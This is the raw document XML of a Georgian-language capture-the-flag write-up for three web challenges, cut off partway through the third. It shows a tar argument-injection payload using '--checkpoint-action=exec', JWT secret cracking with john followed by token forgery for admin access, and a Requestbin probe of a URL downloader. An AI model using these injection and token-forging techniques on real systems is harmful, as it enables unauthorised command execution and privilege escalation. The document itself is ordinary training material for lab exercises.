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E376" w14:textId="5DCD9E55" w:rsidR="00B409EA" w:rsidRPr="00765D2A" w:rsidRDefault="00765D2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>tartarsausage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1595731B" w14:textId="38D6D891" w:rsidR="00765D2A" w:rsidRDefault="00765D2A">
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="253EF7E9" wp14:editId="7BB97930">
            <wp:extent cx="3448531" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="159693228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2286" name="Picture 1" descr="A white background with black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7291" w14:textId="77053BD2" w:rsidR="00765D2A" w:rsidRDefault="00765D2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>საიტზე შესვლისას გვხვდება ორი ფუნქციონალი რაც როგორც ხედავთ გვეუბნება რომ შეგვიძლია ფაილის ატირთვა და დასაბმი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>თ</w:t>
      </w:r>
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ება. მოდი ვცადოთ და ვნახოთ მუ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>შ</w:t>
      </w:r>
      <w:r w:rsidRPr="00765D2A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>აობს თუ არა ის.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B979904" w14:textId="77777777" w:rsidR="00485FF9" w:rsidRDefault="00485FF9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9B0DDD" w14:textId="622D6439" w:rsidR="00485FF9" w:rsidRDefault="00485FF9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485FF9">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="026ACE48" wp14:editId="56783F07">
            <wp:extent cx="5487166" cy="2286319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="328303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33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2824" w14:textId="3FD1FF06" w:rsidR="00485FF9" w:rsidRDefault="00485FF9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485FF9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">ვხედავთ რომ ფუნქციონალი მუშაობს მაგრამ მხოლოდ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">JPEG და </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00485FF9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ფორმატის ფაილებზე</w:t>
      </w:r>
      <w:r w:rsidR="006E1055">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E1471" w14:textId="77777777" w:rsidR="006E1055" w:rsidRDefault="006E1055">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D68200" w14:textId="0A357CF9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მოდი შევამოწმოთ გვერდის სორსი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1EC397" w14:textId="452A4907" w:rsidR="006E1055" w:rsidRDefault="006E1055">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1055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024058BB" wp14:editId="7998A079">
            <wp:extent cx="5010849" cy="3353268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3735050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502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F91B" w14:textId="2CD992E4" w:rsidR="006E1055" w:rsidRDefault="006E1055">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1055">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>როგორც ვხედავთ სორსმა გვაჩვენა რომ გვაქვს რაღაც ფორმა რომელზე გადასვლისას გამოაქვს ფანჯარა რომელშიც შეგვიძლია მუშაობა და ასევე მიგვანიშნებს რომ tar ბრძანება გამოვიყენოთ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58395469" w14:textId="5046ACDA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4262175D" wp14:editId="48272167">
            <wp:extent cx="5830114" cy="1409897"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141951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12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533" w14:textId="25D53D33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09995D6" wp14:editId="1F15F116">
            <wp:extent cx="3038899" cy="390580"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="79163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6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AC7E" w14:textId="16345A03" w:rsidR="00461CB6" w:rsidRDefault="00461CB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461CB6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ნების მიერი ბრძანების შეყვანისას გამოდის ასეთი ტექსტი რაც მიგვანიშნებს რომ უფრო უნდა ვეცადოთ . კაარგი. ახლა ვცადოთ შევიყვანოთ ასეთი payload   cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec="ls"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7776B071" w14:textId="4ACBA46E" w:rsidR="00461CB6" w:rsidRDefault="00C0284C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lastRenderedPageBreak/>
        <w:t>ფეილოუდის გაშვების შემდეგ მივიღეთ შემდეგი ჩამონათვალი მაგრამ ამ ჩამონათვალში ჩვენთვის ყველაზ ემნიშვნელოვანი enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30818251" w14:textId="79EB8552" w:rsid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ოგორც ჩანს ფლეგი ზუსტად მანდ იმალება</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774F522" w14:textId="0ED06ED9" w:rsidR="00C0284C" w:rsidRDefault="00C0284C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D393ECA" wp14:editId="482AC1EB">
            <wp:extent cx="4982270" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1365566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6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877E" w14:textId="613AD2EA" w:rsid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ხსნათ ფლექი </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ბრძანებით.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F024709" w14:textId="4B87B4F4" w:rsidR="00C0284C" w:rsidRPr="00C0284C" w:rsidRDefault="00C0284C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როგორც მოსალოდნელი იყო მივიღეთ ფლეგი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D6EB7" w14:textId="79F8BCA5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566A08B1" wp14:editId="092520A8">
            <wp:extent cx="5943600" cy="441960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35304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7A05" w14:textId="56F4E190" w:rsidR="00461CB6" w:rsidRDefault="00461CB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461CB6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B7E290F" wp14:editId="2C7AC336">
            <wp:extent cx="5943600" cy="269240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55004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45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E72A" w14:textId="4CB4E284" w:rsidR="00461CB6" w:rsidRDefault="00461CB6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ამ ბრძანების ჩაწერის შემდგომ მივიღეთ ფლეგიც.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ctf{e15918e70b7c3395bcb357b4ca5e95f868ebc462d33371a5f44a25c35f8faa45}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C657E" w14:textId="77777777" w:rsidR="00461CB6" w:rsidRDefault="00461CB6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DCCB99" w14:textId="1945DB7D" w:rsidR="00461CB6" w:rsidRDefault="00D962A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB1068" w:rsidRPr="00EB1068">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Underconstruction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="041827E9" w14:textId="77777777" w:rsidR="00EB1068" w:rsidRDefault="00EB1068">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D56D73" w14:textId="014230FA" w:rsidR="00EB1068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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635D8F94" wp14:editId="2C90D667">
            <wp:extent cx="5943600" cy="911225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="153855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53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0ED2" w14:textId="758A80AE" w:rsidR="004D4C94" w:rsidRDefault="004D4C94">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>მოცემულია ვებ გვერდი, სადაც არის რეგისტრაცია და ავტორიზაცია, მოდით დავრეგისტრირდეთ ჯერ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C821C28" w14:textId="56968EA3" w:rsidR="004D4C94" w:rsidRDefault="004D4C94">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4C94">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68EAE525" wp14:editId="0B9E44FC">
            <wp:extent cx="5943600" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154696183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61839" name="Picture 1" descr="A white rectangular object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0F4C" w14:textId="391234F7" w:rsidR="004D4C94" w:rsidRDefault="004D4C94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რეგისტრირდი და ჰოუმ გვერძე გვაქვს ეს მონაცემები.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21C234" w14:textId="007B730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საიტის დეტალებში გადავალთ კონკრეტულად local storage სადაც ვნახავთ ჩვენი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მომხმარებლის შესახებ დეტალებს</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EDC2F" w14:textId="3137A4BC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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB78C59" wp14:editId="0D826E61">
            <wp:extent cx="5943600" cy="953770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="731827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277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693D" w14:textId="415772E2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აქ ჩვენთვის არის ორი საინტერესო ველი role და accessToken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CCA4B9" w14:textId="32376994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ვნახავთ საიტის ჯავასკრიპტის სორს კოდს app.d875ddd5.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C36C73" w14:textId="4F7456CA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3D32502F" wp14:editId="7441F706">
            <wp:extent cx="5943600" cy="4081780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2044345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58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7F0" w14:textId="77777777" w:rsidR="004D4C94" w:rsidRDefault="004D4C94" w:rsidP="004D4C94">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0C4C74" w14:textId="7CE54619" w:rsidR="004D4C94" w:rsidRDefault="004D4C94" w:rsidP="004D4C94">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4C94">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>შემდეგ კოდის ლოგიკაში ვხედავთ რომ ადმინის პანელს გვანახებს იმ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4C94">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>შემთხვევაში თუ ჩვენი როლია ROLE_ADMIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7861DC0F" w14:textId="61F473F0" w:rsidR="004D4C94" w:rsidRDefault="00205D51" w:rsidP="004D4C94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A10A43D" wp14:editId="481DA852">
            <wp:extent cx="5943600" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="204659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05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11AE" w14:textId="5429F002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Local Storage-ში რომ შევცვლით ჩვენს როლს ROLE_ADMIN-ზე გამოგვიჩნდება ახალი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გვერდი “Admin Board” რომელზეც წვდომა არ გვაქვს, რის შემოწმებაზეც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accessToken არის პასუხისმგებელი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F765F" w14:textId="767E126A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5D956943" wp14:editId="47F419D0">
            <wp:extent cx="5010849" cy="1076475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="920564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643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8BB7" w14:textId="05BCE5D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ჩვენ JWT-ს გავატარებთ john ხელსაწყოში მის ხელმოწერის სანახავად რომელიც</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>აღმოჩნდა letmein</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094B7E7" w14:textId="3DA84C14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C7B61B2" wp14:editId="5FA94C0F">
            <wp:extent cx="5943600" cy="4703445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="18938209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099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73E" w14:textId="4501FA45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 xml:space="preserve">შემდეგ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">შევალთ რომელიმე </w:t>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> JWT დეკოდერ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ში</w:t>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> მაგალითად jwt.io და შევიყვანთ ჩვენს ტოკენს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 xml:space="preserve">და ხელმოწერად ჩავუწერთ letmein-ს </w:t>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">რის შედეგადაც </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ვიღებთ შემდეგს:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77EAFD0F" wp14:editId="215B6753">
            <wp:extent cx="5943600" cy="3342005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1338117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70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44DB" w14:textId="22C82453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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>Payload Data ში ვხედავთ ჩვენს აიდის რომელსაც შევცვლით 1-ით რადგან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სავარაუდო ადმინის აიდი სწორად რომ ეგ იქნება და ჩვენს ტოკენს სწორად</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00205D51">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>მიღებული ტოკენით ჩავანაცვლებთ და მივიღებთ წვდომას ADMIN Board-ზე</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9E2840" w14:textId="190B439B" w:rsidR="00205D51" w:rsidRDefault="00205D51" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205D51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02D600E" wp14:editId="1E48901D">
            <wp:extent cx="5943600" cy="3378835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="941751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123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4819" w14:textId="5330A2E5" w:rsidR="00205D51" w:rsidRDefault="00D962A0" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D962A0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE60B54" wp14:editId="74EB4D39">
            <wp:extent cx="5943600" cy="1161415"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="2057258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82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1327" w14:textId="23EDBA39" w:rsidR="00D962A0" w:rsidRDefault="00D962A0" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D962A0">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>CTF{b566bdee4836bbb0bdfb9aff931d7f061b67db0e9cf3859f246261d0acc35438}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D0839" w14:textId="77777777" w:rsidR="00D962A0" w:rsidRDefault="00D962A0" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC71638" w14:textId="77777777" w:rsidR="005B3184" w:rsidRDefault="005B3184" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F84B21E" w14:textId="3750C41A" w:rsidR="005B3184" w:rsidRPr="005B3184" w:rsidRDefault="005B3184" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3184">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3184">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DOWNLOADER-V1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BE2CD" w14:textId="77777777" w:rsidR="005B3184" w:rsidRDefault="005B3184" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E2FBE1" w14:textId="79BBB2BD" w:rsidR="005B3184" w:rsidRDefault="005B3184" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3184">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C4E87C" wp14:editId="6D6B25F5">
            <wp:extent cx="5943600" cy="2379980"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="691199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911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2CB" w14:textId="6CBB927B" w:rsidR="005B3184" w:rsidRDefault="0026055B" w:rsidP="00205D51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იტზე გვხვდება </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">ველი, აქ შეგვიძლია </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Requestb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გამოვიყენოთ და რაიმე სატესტო ფაილი გავგზავნოთ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD9FDF" w14:textId="13FCCBC4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6421E0F6" wp14:editId="20393608">
            <wp:extent cx="5943600" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="119461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14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E2E" w14:textId="10BB19D5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74DAB08E" wp14:editId="2F06110A">
            <wp:extent cx="5943600" cy="6149975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="461418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189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1072" w14:textId="2A4A1B8D" w:rsidR="0026055B" w:rsidRDefault="0026055B" w:rsidP="00205D51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026055B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780FC171" wp14:editId="3D8A6038">
            <wp:extent cx="5943600" cy="653415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="144275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38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BC5F" w14:textId="709E0877" w:rsidR="00EF45F9" w:rsidRPr="00EF45F9" w:rsidRDefault="00EF45F9" w:rsidP="00EF45F9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>საიტზ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ივიღე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შედეგ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ვხედავ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რომ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აიტ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ხმარობ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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF45F9">
        <w:rPr>
